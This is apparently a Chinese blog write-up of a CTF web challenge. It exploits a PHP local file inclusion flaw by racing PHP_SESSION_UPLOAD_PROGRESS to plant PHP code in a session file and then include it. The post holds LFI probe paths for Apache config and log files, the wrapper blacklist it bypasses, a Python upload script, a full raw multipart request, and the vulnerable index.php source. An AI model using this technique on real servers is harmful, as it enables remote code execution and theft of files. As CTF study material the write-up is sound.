记一次PHP_SESSION_UPLOAD_PROGRESS的本地文件包含

于 2021-05-07 19:36:19 发布 695 收藏 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/116499336
版权

来源于今天一位朋友给的题目,叫我帮忙看看

在这里插入图片描述
题目名字是有提示LFI,这个登录框测试了一下发现输入什么都是返回一样,也没有有注入的迹象,url很明显可能存在LFI,尝试下读取login.php

/?page=php://filter/convert.base64-encode/resource=login.php

在这里插入图片描述
有过滤,简单fuzz了下发现过滤了如下

base、file、http、ftp、phar、gopher、data、zip、read、rot、string、decode、flag、.....

但是直接包含也没什么问题
在这里插入图片描述
本来的想法是构造shell被日志文件记录,然后包含日志文件来getshell,但是通过很多配置文件找到日志文件位置竟然无法包含,这就挺迷的。

 /?page=/etc/apache2/apache2.conf

在这里插入图片描述

/?page=/etc/apache2/sites-enabled/000-default.conf

在这里插入图片描述

/?page=/etc/apache2/envvars

在这里插入图片描述
根据这些配置文件的信息,日志文件位置应该是

/?page=/var/log/apache2/access.log

在这里插入图片描述
啥都没有回显出来,构造shell包含也无法起作用。

然后想起来,前些日子安恒月赛的时候,当PHP Version>5.4在默认情况下,可以利用到PHP_SESSION_UPLOAD_PROGRESS来初始化session,并且会把上传文件的信息记录在session文件中,待上传文件结束后清除存储上传文件信息session文件。

更多关于session.upload_progress请参考:https://www.freebuf.com/vuls/202819.html

那我们就可以通过把上传的文件改为shell内容,然后通过包含来执行我们shell内容,至于session默认地址就那常见的几个,简单测试下就测试出来了

# -*- coding: utf-8 -*-
import requests


url = 'http://xxx.xxx.xxx.xxx:xxxx/?page=/tmp/sess_mochu7'
mydata = {'PHP_SESSION_UPLOAD_PROGRESS':'<?php phpinfo();?>'} 
myfile = {'file':('mochu7.txt','mochu7')}
mycookie = {'PHPSESSID': 'mochu7'}
r = requests.post(url=url, data=mydata, files=myfile, cookies=mycookie)
print(r.request.body.decode('utf8'))

得到POST内容

--dca6fb822b1647c7236dfa8b08e1e7fe
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

<?php phpinfo();?>
--dca6fb822b1647c7236dfa8b08e1e7fe
Content-Disposition: form-data; name="file"; filename="mochu7.txt"

mochu7
--dca6fb822b1647c7236dfa8b08e1e7fe--

完整一下POST数据包,更改下Content-Type即可

POST /?page=/tmp/sess_mochu7 HTTP/1.1
Host: xxx.xxx.xxx.xxx:xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Length: 351
Content-Type: multipart/form-data; boundary=---------------------------dca6fb822b1647c7236dfa8b08e1e7fe
Cookie: PHPSESSID=mochu7

-----------------------------dca6fb822b1647c7236dfa8b08e1e7fe
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

<?php phpinfo();?>
-----------------------------dca6fb822b1647c7236dfa8b08e1e7fe
Content-Disposition: form-data; name="file"; filename="mochu7.txt"

mochu7
-----------------------------dca6fb822b1647c7236dfa8b08e1e7fe--

Intruder500左右个包即可有执行回显,类似条件竞争,抢在被清除前包含执行

PS:如500个包没有一个执行的,数量可以继续加,我这里测试的时候500是有个别个包能执行的
在这里插入图片描述
成功执行了shell,接下来切换下payload继续发包
在这里插入图片描述
发现可疑flag,/etc/.flag_JHb28snkjhASBvs.txt
在这里插入图片描述
读取即可
在这里插入图片描述
在这里插入图片描述
最后贴一下读取到源码
login.php

<?php error_reporting(0);?><!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<title>login</title>
	
	<meta name="viewport" content="width=device-width, initial-scale=1">
<!--===============================================================================================-->	
	<link rel="icon" type="image/png" href="http://web2.utctf.live:5006/static/images/icons/favicon.ico">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="./bootstrap.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="./font-awesome.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="./icon-font.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="./animate.css">
<!--===============================================================================================-->	
	<link rel="stylesheet" type="text/css" href="./hamburgers.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="./animsition.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="./select2.min.css">
<!--===============================================================================================-->	
	<link rel="stylesheet" type="text/css" href="./daterangepicker.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="./util.css">
	<link rel="stylesheet" type="text/css" href="./main.css">
<!--===============================================================================================-->
</head>
<body>
	
	<div class="limiter">
		<div class="container-login100">
			<div class="wrap-login100 p-b-160 p-t-50">
				<form class="login100-form validate-form" action="" method="post">
					<span class="login100-form-title p-b-43">
						Account Login
					</span>
					
					<div class="wrap-input100 rs1 validate-input" data-validate="Username is required">
						<input class="input100" type="text" name="username">
						<span class="label-input100">Username</span>
					</div>
					
					
					<div class="wrap-input100 rs2 validate-input" data-validate="Password is required">
						<input class="input100" type="password" name="password">
						<span class="label-input100">Password</span>
					</div>

					<div class="container-login100-form-btn">
						<button type="submit" class="login100-form-btn">
							Sign in
						</button>
					</div>
					
                </form>
			</div>
		</div>
	</div>
    
</body></html>

<?php

if (isset($_POST['username']) && isset($_POST['password'])) {
	$u = $_POST['username'];
	$p = $_POST['password'];
	echo("<script>alert('incorrect username or password');</script>");
}

?>

index.php

<?php
error_reporting(0);

if (isset($_GET['d3bug'])) {
	phpinfo();
}

if (isset($_GET['page'])) {
    $page = $_GET['page'];
    $filter = "/\.\.|base|file|gopher|http|ftp|phar|base|string|data|zip|compress|base|decode|read|pear|rot|crypt|pear|utf|flag/i";
    if (preg_match( $filter , $page) ) {
        die("hacker");
    }
    include $page;
} else {
    echo "<script>location.href='./?page=login.php'</script>";
}
末初mochu7
关注
  • 6
    点赞
  • 1
    收藏
  • 打赏
    打赏
  • 0
    评论
PHP基于session.upload_progress 实现文件上传进度显示功能详解
10-16
主要介绍了PHP基于session.upload_progress 实现文件上传进度显示功能,结合实例形式分析了php5.4版本session.upload_progress特性实现文件上传进度显示的相关操作技巧,需要的朋友可以参考下
对于session.upload_progress漏洞的理解
Huamang的博客
03-06 809
先放两个文章: https://www.freebuf.com/vuls/202819.html https://www.cnblogs.com/NPFS/p/13795170.html 利用session.upload_progress进行文件包含: 信息介绍: session.use_strict_mode默认值为0,此时用户是可以自己定义Session ID的。 比如,我们在Cookie里设置PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag(还有可能在 /v
利用session.upload_progress进行文件包含
qq_44657899的博客
10-26 3454
前言 又一种新的文件包含利用方法,录一下复现过程。 学习自:LFI 绕过 Session 包含限制 Getshell 利用session.upload_progress进行文件包含和反序列化渗透 文章目录前言kali本地测试利用burp利用python脚本 kali本地测试 所有配置都为默认配置 大概原理:利用session.upload_progress上传一个临时文件,该文件里面有我们上传的恶意代码,然后包含它,从而执行里面的代码。因为该文件内容清空很快,所以需要不停的上传和包含,在清空之前包含该
Php中设置Session超时时间登录时间限制
洋洋
11-29 8087
最近某个PHP项目用到了限制登录时间的功能,比如用户登录系统60分钟(www.phpfensi.com)后如果没有操作就自动退出,我搜索了网络收集了有以下方法可供参考. 第一种方法即设置php.ini配置文件,设置session.gc_maxlifetime和session.cookie_lifetime节点属性值,当然也可以使用ini_set函数改变当前上下文环境的属性值,代码如下: i
利用PHP_SESSION_UPLOAD_PROGRESS上传webshell
god_Zeo的安全博客
09-24 448
0x01 环境配置&利用条件 环境分析 session.use_strict_mode默认值为0,此时用户是可以自己定义Session ID的 我们在Cookie里设置PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag session.upload_progress.prefix由我们构造的session.upload_progress.name值组成,最后被写入sess_文件里。 所以: 这个文件名是PHPSESSID=flag,文件名
session.upload_progress文件包含
Aiwin的博客
05-29 417
session.upload_progress文件包含
session.upload_progress进行文件包含和反序列化学习
snowlyzz的博客
09-07 253
利用session.upload_progress进行文件包含
php上传完没进度条_php如何实现上传进度条
weixin_29027305的博客
03-08 61
php实现上传进度条的方法:首先向服务器端上传一个文件;然后用PHP将此次文件上传的详细信息存储在session当中;接着用Ajax周期性的请求一个服务器端脚本;最后通过浏览器端的Javascript显示更新进度条即可。实现文件上传进度条基本是依靠JS插件或HTML5的File API来完成,其实PHP配合ajax也能实现此功能。PHP手册对于session上传进度是这么介绍的:当 session...
文件包含骚姿势——利用session.upload_progress进行文件包含
weixin_46330722的博客
12-25 1339
利用session.upload_progress进行文件包含
[CTFSHOW]利用PHP_SESSION_UPLOAD_PROGRESS进行文件包含
Y4tacker的博客
11-02 1868
文章目录代码审计脚本参考文章 代码审计 考点是:利用PHP_SESSION_UPLOAD_PROGRESS进行文件包含 通过观察代码,可以看到过滤了大部分的文件包含函数,这里我们利用PHP_SESSION_UPLOAD_PROGRESS加条件竞争进行文件包含,具体原理可以看看下面这篇参考文章 <?php if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file);
PHP 基础知识
Lixuanyi6181的博客
05-29 1247
前端开发者必会的后端语言
PHP 基本知识点介绍
最新发布
weixin_43844718的博客
09-14 533
PHP 基本知识点介绍。本篇仅是简单讲一下PHP最基础的语法,其他的语法就不多说了,可以去参考官方文档,或者菜鸟教程,下一篇主要把一些常用的函数整理一下,方便查询。
session.upload_progress反序列化学习
..
03-10 1586
Session的配置选项和存储方式 在php.ini中存在四项配置项: session.save_path="" --设置session的存储路径 session.save_handler="" --设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式) session.auto_start boolen --指定会话模块是否在请求开始时启动一个会话,默认为0不启动 session.serialize_handler string --定义用来...
php-session文件包含和反序列化(对session.upload_progress的利用)
unexpectedthing的博客
02-11 1112
文章目录前言session的简介PHPsession的存储方式php.ini中的一些配置php中的session.upload_progress文件包含反序列化$_SESSION变量直接可控$_SESSION变量不可控参考链接 前言 本文是利用PHP_SESSION_UPLOAD_PROGRESS进行文件包含和反序列化的总结。 也就是关于php-session文件包含和反序列化 session的简介 session被称为“会话控制”,Session 对象存储特定用户会话所需的属性及配置信息。这样,当用
浅谈PHP_SESSION_UPLOAD_PROGRESS和条件竞争的巧妙利用
qq_52737372的博客
07-20 733
前些阵子CISCN
PHP中的Session Upload Progress 设置问题
超人学飞的日子
07-06 1782
在写CTF题目的时候遇到了session反序列化的漏洞,需要通过Session Upload Progress来写入seession的值。在本地测试时遇到了些问题:fool1.php:&lt;?phpini_set('session.serialize_handler', 'php_serialize');session_start();//$_SESSION['ryat'] = $_GET['r...
基于session.upload_progress 的文件上传进度显示
koastal的博客
10-31 5481
介绍session.upload_progressPHP5.4的新特征。 当 session.upload_progress.enabled INI 选项开启时,PHP 能够在每一个文件上传时监测上传进度。 这个信息对上传请求自身并没有什么帮助,但在文件上传时应用可以发送一个POST请求到终端(例如通过XHR)来检查这个状态。 当一个上传在处理中,同时POST一个与INI中设置的s
php通过session实现upload_progress
prape's world!
01-07 1080
php中,显示上传文件进度有swf,apc,纯javascript等集中方法,而现在比较推荐的是利用phpsessionPHP>5.4)实现,这里,我简单的录一下。 相关资料可以参考php.net/manual/en/session.upload-progress.php,还是相对比较简单的,可以参考www.111cn.net/phper/php-cy/54314.htm这里的讲解,但是
上传进度支持(Upload progress in sessions)
10-19 1107
作者: Laruence 本文地址: http://www.laruence.com/2011/10/10/2217.html 文件上传进度反馈, 这个需求在当前是越来越普遍, 比如大附件邮件. 在PHP5.4以前, 我们可以通过APC提供的功能来实现. 或者使用PECL扩展uploadprogress来实现. 虽然说, 它们能很好的解决现在的问题, 但是也有很明显的不足:
php+uploadprogress实现上传进度功能
bjx18356163055的博客
02-13 1408
文件上传进度反馈, 这个需求在当前是越来越普遍, 比如大附件邮件. 在PHP5.4以前, 我们可以通过APC提供的功能来实现. 或者使用PECL扩展uploadprogress来实现. 虽然说, 它们能很好的解决现在的问题, 但是也有很明显的不足: § 1. 他们都需要额外安装(我们并没有打算把APC加入PHP5.4) § 2. 它们都使用本地机制来存储这些信息, APC使用共享内存, 而u

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末初mochu7

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值